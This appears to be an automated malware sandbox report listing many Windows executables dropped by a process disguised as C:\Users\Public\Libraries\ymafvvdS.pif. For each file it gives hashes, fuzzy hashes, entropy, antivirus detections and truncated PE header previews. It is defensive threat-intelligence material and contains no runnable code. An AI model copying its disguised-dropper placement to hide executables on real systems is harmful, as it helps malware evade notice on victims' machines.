Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1318400
Entropy (8bit):7.448738764083758
Encrypted:false
SSDEEP:24576:KeR0gB6axoCf0R6RLQRF/TzJqe58BimQsqjnhMgeiCl7G0nehbGZpbD:GgHxmR6uBTzge5MimMDmg27RnWGj
MD5:7A4B29624BD70D7B7807095073F7C451
SHA1:0151D8D343B761DA7D6F6C56C8EC3EAE1A17C22C
SHA-256:E8B86A47128C990C02F35A433725C96B2602CD05D2735DC27F7ECBB3728AB872
SHA-512:2E2C9846AD709199FE1698466F83C50930D89A668BFB867AF0B3A500DC97ABFE57E3EA103E733282792DA5BC7FFCE0F0ADC30C33076F1D65F895AB9504E4CC42
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446047452618332
Encrypted:false
SSDEEP:12288:7nEbH0j4x7R6SvyCMaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:7kwOtO7asqjnhMgeiCl7G0nehbGZpbD
MD5:5DF2B9783C1A770CA79D3500BDB71758
SHA1:E9489A78FC1322D92801954D7B049EE8695ADDC9
SHA-256:8943CEC6DE36C516FDA64B9D97DB493EB61C8EA57827AC92FAA7E25714F378BD
SHA-512:B822F2F168CB7063A1501D3F4B8A46E3DE1A0349462A0A4F5307459240B7980856D22EE01DDD1BD95699E82A109786A258EA45207D744F62E6F4E99897FF2FFB
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1375232
Entropy (8bit): 5.446808328635351
Encrypted: false
SSDEEP: 24576:6nU/h/4KZsqjnhMgeiCl7G0nehbGZpbD:6U/VdDmg27RnWGj
MD5: 9C392A3EA0F6FBAC0EFEBF4935223463
SHA1: 1ED8FB566021837E216645DB73223E33E2529840
SHA-256: 17B0ECAC9F680D11F097D42A852B62EC6BACB55B037437A12AFD992391426BD9
SHA-512: D0A24D1FCA3FC98C079C9A5E8CC2DD9674856C435964AEE14178A7E8B7A3B7A728B7700251D171F6E3804DF2B2D41E41B9932AF72578FC17EDD14AF82021FB36
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1513984
Entropy (8bit): 5.483716331585078
Encrypted: false
SSDEEP: 24576:yx71iBLZ05jNTmJWExGsqjnhMgeiCl7G0nehbGZpbD:yxhiHIjNgKDmg27RnWGj
MD5: ED719449EA36376991AAD182B6D80824
SHA1: 1C5AAA288C578BFA9AB225BC79314FBF970AE32B
SHA-256: FB6839EE0109B6576BC4A1A09D7F0A46E62D95831A089CA4438D8D380C25DEB5
SHA-512: EFF13B82AD5D7B3649EAFC4F9352889586284F5BAED1F56C8C9A3F5924C247541D2FBBC5647E06DE49F6D9756703C9F61874B6A193C3951C4F48BD59BC32609F
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1419264
Entropy (8bit): 5.4666969436459825
Encrypted: false
SSDEEP: 24576:BlnRklQ6fgJcEwixYsqjnhMgeiCl7G0nehbGZpbD:9oRfgJcEwCEDmg27RnWGj
MD5: 4E3284A179E53D9E6D0119FC9EA43F8F
SHA1: D99A8F122B1EF58B35F6874D03324690A35A263E
SHA-256: 8C2308E01341AB8B66F8A9A40ACD3DC3AAABCF1734A581154E9C7CDBD60521D4
SHA-512: D7A92B85B23A701E7D28EE8F715A1432A96A6611450938745A0C7AB7855D18F19DC1E82AB6C99E19A032A28CE48B7EA441580A9299FAB5AF1BEA3227CBA7A56A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1522176
Entropy (8bit): 5.496509486836508
Encrypted: false
SSDEEP: 24576:SW25k8hb0Haw+xosqjnhMgeiCl7G0nehbGZpbD:SWyk8SHawmUDmg27RnWGj
MD5: E88EADF7D86CC06637243EDC6E3615CA
SHA1: 73A4A4EA349947A5A698111934A66360B42AF945
SHA-256: 3567AA9983C0967BDA1A18FCBF093300E033F154230175E64EE9A564114E0F5B
SHA-512: 18B9A7E419CF1561D8357F795B91E249702E0BC3650BA3B4D5FE19A74595335257480CFD585289623BC06DE2564D9C2EA74674AD59EFEBE4949B2084AB4DEEE1
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1282048
Entropy (8bit): 5.1639369669066975
Encrypted: false
SSDEEP: 12288:UWP/aK2vB+TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:UKCKABAsqjnhMgeiCl7G0nehbGZpbD
MD5: 07F0208AA8F68AC1FA2E4CCE75DAD540
SHA1: A2230FC30FA097EFB8315B54F0A4A059CDF3D0AC
SHA-256: 52A870A066DBBEF6944ADF038A0D04020543D9407A15FEBD5C4F8E1DDAB7CCAE
SHA-512: FCF819F40BCD75614B487879D40D5A86C9EAF429301F2907026E1A88F61D2DF5E64611BFE392E756D9B15C30C13F7CFA78F01966225AF445C15015DB677824E0
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1228288
Entropy (8bit): 5.162019452015766
Encrypted: false
SSDEEP: 12288:XO7cCNWB+09JXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:ejNWBPDsqjnhMgeiCl7G0nehbGZpbD
MD5: 7CE1D0B4F64D184766C1722B6E5FD6AC
SHA1: 8B28CC577AF3ABF87CE9F45DBEB77CEE3E9A8A00
SHA-256: 89F4C6A0C8E34A3206E1262C26322AE0BB01AEE8432198D1440127C56C22578F
SHA-512: 7B4307C76C2F4F18B21961B3A25DBAB267E92C225026E54BCAE4B983F00A0E69D7772C87FF0386D88CC6B0563AFB9BA0EDD1D8C1C24482B2D49E2A70C1356BDE
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1302528
Entropy (8bit):5.238917207681283
Encrypted:false
SSDEEP:24576:jihRyhdsRrNsqjnhMgeiCl7G0nehbGZpbD:jihsoRxDmg27RnWGj
MD5:4FFD9D6F90EE6EEC72E4B44B1AD6530C
SHA1:57BE122E9F1624025AB97B127213F1BC00F3D2DC
SHA-256:AC0029CA41B365D8B43C195BBFCB5D9855A4CDBF02600663E9F116457E14DB85
SHA-512:4EB02DD3D81BA63F2574397C9E9B6029D5D5E349E0715F1E06524C5DC5A15BC4BE85372C3EC4884C79BA1DB93330F89E404DD1028AF2BE603CEB3CDFF71DAFDC
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1342464
Entropy (8bit):5.3509963854210705
Encrypted:false
SSDEEP:24576:I1FDmRF+wpx/QafCsqjnhMgeiCl7G0nehbGZpbD:2mRF+wn/JfGDmg27RnWGj
MD5:F172D15708A0F26C2F5397316F96B8AD
SHA1:8B60BDDBEF974353D02C79C31DFD018C07EE9052
SHA-256:0B66ED1D6EFCF6B19FF32B82CF791A9E6150EB93004B1D7D68A5C139D79522B5
SHA-512:0D75657C0307182B50898B85DE503AD7B88CEC8EB2897F37E6D4F2C7970FB57FE60D7A6485B88D9930D0C1CEA1F71D881556FBD71BFC101123109D01C9CBF3BC
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1228288
Entropy (8bit):5.161976757557592
Encrypted:false
SSDEEP:12288:b2Ae621B+0YPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:aE21BPUsqjnhMgeiCl7G0nehbGZpbD
MD5:E33605B65EE0C815163C5F327421BF80
SHA1:33BA6707E65A3529AE9F9342ACC0B34225207B08
SHA-256:B3B488A60E831A255A2CF9C4715BCFD00871D35BA885CA83F7B67FA4B2282CFF
SHA-512:13E3CDC9AB57FFC87BEB5269F77FE4517C0071271F288E87AAF0E18B4698EFE940FF6E7B21A9F5CF8A40100CDE04F19A554976EEAAE88D3FF77516CE2F48E545
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2151936
Entropy (8bit):7.987634321390246
Encrypted:false
SSDEEP:49152:sZkVX3lfrFfR0BecCqKBs+4o8YhAjDmg27RnWGj:sqR1frZRpcTKX4dD527BWG
MD5:E666A6F317AD1140BAF49F854D6A2851
SHA1:6EDE93CC05EEE183090360BFA127DDF1989ECB3F
SHA-256:3E8A855E053D3D8B0983166CF667ADBE53DBEC83792062E7AA93E73D8E61B495
SHA-512:346EA4F00B071C6A049D7238D67DBD23A0E4E8BE11BE143EB45916754F2A752DBCE24ABC7F190C324F4F073BBE870B4F2FC6DD114596E0090928B5D3560A8A78
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2151936
Entropy (8bit):7.987634808018328
Encrypted:false
SSDEEP:49152:EZkVX3lfrFfR0BecCqKBs+4o8YhAjDmg27RnWGj:EqR1frZRpcTKX4dD527BWG
MD5:940C41EE1F74C74A35EF5AA1D5092FB4
SHA1:59107ECF6958E32C12CB68BE69F982E3BC67673F
SHA-256:C3B06AC4BBA3A0313A2E75A1A845F79E41B1D4C1F545874FC2FC2A6F04FD101D
SHA-512:C7E74A2A49F1BF89D315FEF911A69465BA51EDD6FFD3F737B24EBE8DA9FA99496AE77C82A7D821B235CA35602408BA6D1FBB2C33A56AEE7A59974A42587F1F65
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1158144
Entropy (8bit):5.068076042217309
Encrypted:false
SSDEEP:12288:iAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iAsqjnhMgeiCl7G0nehbGZpbD
MD5:115BDA5A506086F1BEEE739C85432E4F
SHA1:622FBD25330255E8F0CB39E9F0DA395A1436B65B
SHA-256:973BA0BEC7D44DE34230BEB11E2CCE517119FCE51E65F2B668F6C000E3A996FC
SHA-512:E5C2C5DA4B48AE635A7854DD1B62E11DAFDE29EFAA40D6BF87DE6A058747BC2DBBF63728C607761AC225664738499A00BFD2952C2112B04456FAB682F59A3AEC
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032402776408183
Encrypted:false
SSDEEP:12288:pKzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:czsqjnhMgeiCl7G0nehbGZpbD
MD5:D4C4349403180A88DEAB5B72CC609450
SHA1:0CBCF26D312F11B96E378BA55710094ECE04CEAD
SHA-256:7521A80A3EA91EFAAF0B6A6E887EAD893C3383725742F607787F59D38BFE0ED0
SHA-512:5A971CA0F8B3D93D9FF240F034FA8245B1DED01BBC31D96A427344B7C23C143AB4FA0278DE45D53109ED656706C60AE2FEF42996312066C6702001344DC010FB
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446050733245264
Encrypted:false
SSDEEP:12288:qnEbH0j4x7R6SvyCMaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:qkwOtO7asqjnhMgeiCl7G0nehbGZpbD
MD5:5E9EA3B41AD5A813D84B471C8F0AE340
SHA1:6458DE7D26B0EA0A91C988CB54C1CF6E96074BB0
SHA-256:AE2D0E60D243E6BFF3FC479395B6D3B5678387B313DD4B3EF270719A4B8CED43
SHA-512:12A8E8677F4BAEDE1D21DE18B8DB701852D28143AC3D78510F8D3363FD93C1B8A926741AA8C9B1F00F4B79643D6B35B9F6A665D1F7C55D998B48C46C7B21AD0D
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1212416
Entropy (8bit):5.119726222919098
Encrypted:false
SSDEEP:12288:yv1vv3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:O1XsqjnhMgeiCl7G0nehbGZpbD
MD5:B05EE43934CE97A7F41B1C2F616B6A60
SHA1:7001A649A1799F77EB8211F8F33853FB2911E678
SHA-256:0A735675BDC43BCAA821155563D816D57BB6F410A7197E962F3E8E1A38D31EEF
SHA-512:CB38AFB7EA725881A1CE4408E7DBC849E4BEC33A63A5CD92AE607E96CF7EC65531B52829C09ED91D11F1B9CB17499E6E50AA3B13C50D9F8C530E811F4D1951BD
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446803554950029
Encrypted:false
SSDEEP:24576:8nU/h/4KZsqjnhMgeiCl7G0nehbGZpbD:8U/VdDmg27RnWGj
MD5:325D341BAE4D0FE843169CCB026BAA85
SHA1:2038FE246B68318CD7AF72693F9F48DDE241B125
SHA-256:0373A46F4DC16F3E9357A6EB5A2DEB9B79AC577BDAE0D81EB76F9AB13B614394
SHA-512:8C95967D4FEF86811E80D42AA2EF3B6660850369D5DC036F27B41586924CD2A0D09CA8EFA1D9BD966B3D89F373FF99791B61EE6DB950CA555B8455A031907619
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):5.483714593158854
Encrypted:false
SSDEEP:24576:Tx71iBLZ05jNTmJWExGsqjnhMgeiCl7G0nehbGZpbD:TxhiHIjNgKDmg27RnWGj
MD5:27E1562AD949CC8CCA05F96EAE7A8E3E
SHA1:7BC3559EBFC2677E4E4404FE2DE23E236B2166BB
SHA-256:54005CF8AC48F61B94F5F6EEEA31AB956543C8E99AFDE2F7B81F5546EFC30FE7
SHA-512:0FCDFFFA10C7B82C9045CA2E6E2FB820D051112145CBCE5DA30AE11E482E357E00EFFE67B49840AE4DEA672DD09FD9B8C0D0994EEE090C75BB5FBBC9F5824142
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032888848595981
Encrypted:false
SSDEEP:12288:q3rjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iXsqjnhMgeiCl7G0nehbGZpbD
MD5:4FFF31966792EDDC23CC93C3A1191E20
SHA1:5FFA6DDE1B61A01B6B6ECC08500ECFE3DBB6BCB6
SHA-256:935BF83FDE39628411EFAF4277A343BE5DD348907B4E6175F17A80BCA2C5A994
SHA-512:E03E7008A9E1F4C5CBBB5D2023199F8CD6E232137AECE4352E7F65E637C1C2D148C3D3C03297FB3D371E0A06FB8EC51A20E2DDE121D58F4B8F17A46F31706C68
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1242112
                                                                                                                                                                                                                        Entropy (8bit):5.172662146577943
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pYdP/MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GdP/MsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:FEC6D29E2EA526BE7F0C118307855FA0
                                                                                                                                                                                                                        SHA1:6DD28670E88F1FEDA2EB1312E11CC81F3889BE0A
                                                                                                                                                                                                                        SHA-256:AB74DE07B2648D4EB74ECE13C1D30CAD0DA6365E22AB19571FF46E669BE0C39B
                                                                                                                                                                                                                        SHA-512:7363828A580681CB27EB40E4F003D194614C3A7D60BFD39E6E12A80892AA8D0DA4E5AEA1249B28002761E9D9E57EA6570A7BF00C969CA52E41186B5AC50ECBB6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032913117530654
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:Ry5LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:U5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:1EA4645047AE86082FABC2D10DA54D3A
                                                                                                                                                                                                                        SHA1:AD54B4035646728DCBB4983878D779D875C8072F
                                                                                                                                                                                                                        SHA-256:E5FE720273696BDBA8183E11C3C2501A477D4FDA122E29475B0666475389DAA7
                                                                                                                                                                                                                        SHA-512:27D7595B260E2E3733711F7A1A177B0E5884C932D49D93634F317AFBC3C973618F400E3C51D84DD531CDC43D314637A0B42F99DE21B637CF3730E031F7495B4D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032982479460106
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:iKlzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:3C48A532BA1A722EBA8FB0C1AA8B83A3
                                                                                                                                                                                                                        SHA1:CAA6E9FB8833349CB8ADDE482C12BA299EEC7C54
                                                                                                                                                                                                                        SHA-256:AF23E6F42B47DCB83278C4CFA7DA8506B0C77CBE49E70B97985A3CB5779F877C
                                                                                                                                                                                                                        SHA-512:E9ED81E20B4B5130C52FCB7992DBEC52375A991A3C41872738FC9485CFB812BAEFBD2BB780A2D5DF3377AB21990EA9557BA64BC8341DEF639140A73DFEDCE4B1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................Y........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032983018014891
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:UilzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9dsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:E61AFD8C042A007706B30B8CFE53511D
                                                                                                                                                                                                                        SHA1:7F3583793069656985F1910D75950C0863ACA280
                                                                                                                                                                                                                        SHA-256:7EC82559637B89AC0FD26A5DBFC674052FF4CF1B9701228A01D305F7ED91B7ED
                                                                                                                                                                                                                        SHA-512:A143D41D63D0DC3EE571E140EC58879A9937356F845A9B890BD9CC294E095194EA9B356F095B7F065798CE614F79804EB07397FB56936EFD75F2D69540D19832
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................2.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032943815775521
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:9TmTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:08DFC109B332D4D9EA6879CC4CE2A843
                                                                                                                                                                                                                        SHA1:A8B1974FA687971EB11190D46B3E76B1C291DD43
                                                                                                                                                                                                                        SHA-256:50F1C56A48CCAC7910042E4A81438B44B8322CDCBAD30C0BB9ABD6D329BBB87F
                                                                                                                                                                                                                        SHA-512:798BBED3B21292B80152279C626E33A8DA541DE2B4EB508BF4FDDCCB92091D1878109D853C151EE19018DDE25731E77ABD99972D53378DF9154232E2BDBE56C8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................N........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.033868744252427
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:Ram3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:B6C409A5754AFB9FC86B353764F50856
                                                                                                                                                                                                                        SHA1:0172A73A9C7033741D8308673FDBAD9B7EFEFE6C
                                                                                                                                                                                                                        SHA-256:D4702F65856B48BD52903E0B1848AE0C3B730E36D8414C8896AFADDE17773AA0
                                                                                                                                                                                                                        SHA-512:85F26976662D177B972F54F746FBDDD805F60914CDA9B43542BD07251F3A0D3F593CB0EC7BF41A0AEEB8C1BCA378E67C3BF8060ECAC2011FA84BAEAFF28B9914
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.0329378627274455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:2Q5LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9RsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:0DE24A23444F47BF8B88FE4EBFF6EB56
                                                                                                                                                                                                                        SHA1:8F4CAD174F962BAB5ED226B2E0406DBA05282816
                                                                                                                                                                                                                        SHA-256:DCDC0249A07AE61CDECBBE979CC93E9842BCC2AA101FA19975810F3D5234EED7
                                                                                                                                                                                                                        SHA-512:5200FA31FFCAF55D5E8584B14923FCD7E8E14D86330549BA7F3D8300ACF188E3890F302A92C849082C63BA6F54028CFD5DF7529B74C7806824F41D7D83E41926
